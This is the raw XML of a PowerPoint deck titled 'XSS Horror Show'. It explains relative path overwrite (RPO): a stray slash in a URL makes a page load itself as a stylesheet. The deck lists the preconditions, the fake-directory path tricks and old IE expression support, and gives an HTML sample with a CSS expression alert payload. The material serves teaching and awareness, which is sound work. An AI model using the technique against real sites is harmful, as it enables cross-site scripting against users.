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1" r:id="rId3"/>
    <p:sldId id="262" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="304" r:id="rId7"/>
    <p:sldId id="263" r:id="rId8"/>
    <p:sldId id="264" r:id="rId9"/>
    <p:sldId id="265" r:id="rId10"/>
    <p:sldId id="266" r:id="rId11"/>
    <p:sldId id="267" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="269" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="271" r:id="rId16"/>
    <p:sldId id="273" r:id="rId17"/>
    <p:sldId id="275" r:id="rId18"/>
    <p:sldId id="274"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1" r:id="rId33"/>
    <p:sldId id="292" r:id="rId34"/>
    <p:sldId id="293" r:id="rId35"/>
    <p:sldId id="294" r:id="rId36"/>
    <p:sldId id="295" r:id="rId37"/>
    <p:sldId id="296" r:id="rId38"/>
    <p:sldId id="297" r:id="rId39"/>
    <p:sldId id="298" r:id="rId40"/>
    <p:sldId id="299" r:id="rId41"/>
    <p:sldId id="301" r:id="rId42"/>
    <p:sldId id="300" r:id="rId43"/>
    <p:sldId id="302" r:id="rId44"/>
    <p:sldId id="303" r:id="rId45"/>
    <p:sldId id="305" r:id="rId46"/>
    <p:sldId id="307"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varScale="1">
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="-6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CAFD9-2D92-4B9E-869E-A1A864972DCD}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>20/05/2015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9ECC0-9B08-4977-938E-0F582797538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F79ECC0-9B08-4977-938E-0F5827975386}"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EE980-A6A1-4B30-B498-892176D503D1}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>20/05/2015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E81519-217A-4079-B391-778CE811315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EE980-A6A1-4B30-B498-892176D503D1}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>20/05/2015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81519-217A-4079-B391-778CE8113154}"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w-black.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="611560" y="1700808"/>
            <a:ext cx="7920880" cy="325515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relative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>urls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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 7" descr="zombie.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="1556792"/>
            <a:ext cx="10215536" cy="5472608"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="screenshot4.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="641738" y="2348880"/>
            <a:ext cx="9083643" cy="49149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Understanding the problem</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r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Relative path references a style sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We add a slash to the URL that the code isn’t expecting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The browser tries to find the style sheet at a different location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The browser returns 404 or 302 </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="css.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="1700808"/>
            <a:ext cx="8153602" cy="1872208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528"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bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Your code could be vulnerable</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down)">
                                      <p:cBhvr>
                                        <p:cTn id="3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relative path overwrite</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r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Overwrite the intended relative path by providing a new path using slash /</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Provide the expected file with valid data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execute the expected file and take advantage of where you execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSS is the obvious target but RPO works with any format that uses a relative URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="rpo.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="586397">
            <a:off x="2391013" y="1429255"/>
            <a:ext cx="3640371" cy="51571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lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Require some persistent text on the page, such as a subject in a web mail client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Require a relative path that references a style sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Require a browser that will render the style sheet and execute code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="ie.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="19714732">
            <a:off x="1604642" y="2301742"/>
            <a:ext cx="4267200" cy="50101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a:xfrm>
            <a:off x="467544" y="1772816"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quick CSS lesson</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“In some cases, user agents must ignore part of an illegal style sheet. This specification defines ignore to mean that the user agent parses the illegal part (in order to find its beginning and end), but otherwise acts as if it had not been there.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>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If we can get the browser to point to a web page that contains CSS maybe we can render it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using CSS selectors we can ignore any invalid CSS (such as HTML) that happened before</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Expressions are our friend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Web page contains relative style sheet to style.css</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We provide the shortest XSS vector in the world “/”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The style sheet loads the web page as the style sheet using the following path “/test.php/styles.css”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normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="styles.css" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{}*{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss:expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(alert(1))}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://somewebsite/someurl.php/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buNone/>
            </a:pPr>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20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20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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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fade">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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fade">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="20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What about ../ type paths?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Luckily you are safe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Actually I lied you are not safe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="rpo2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1151284">
            <a:off x="2119712" y="1173093"/>
            <a:ext cx="3843687" cy="54452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 the browser tries to go up in the document structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It doesn’t know the actual file on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If we provide a fake directory then we can send the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> back to our html page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“/index.php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fakedirectory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fakedirectory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://localhost/relative/index.php/styles.css</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>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w-black.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5635640" y="1556792"/>
            <a:ext cx="3508360" cy="3888432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>XSS Horror Show</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                  <a:srgbClr val="FF0000">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>scary XSS vectors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="-243408"/>
            <a:ext cx="9144000" cy="8384604"/>
            <a:chOff x="0" y="-243408"/>
            <a:chExt cx="9144000" cy="8384604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4" descr="blood-splat1.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2085975"/>
              <a:ext cx="5772150" cy="4772025"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5" descr="blood-splat2.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2162175" y="-243408"/>
              <a:ext cx="6981825" cy="4924425"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6" descr="blood-splat3.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3707904" y="4293096"/>
              <a:ext cx="5067300" cy="38481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Exploiting RPO</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Expressions work in IE10 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quirks mode or old </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>doctypes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> enable expressions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Iframing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
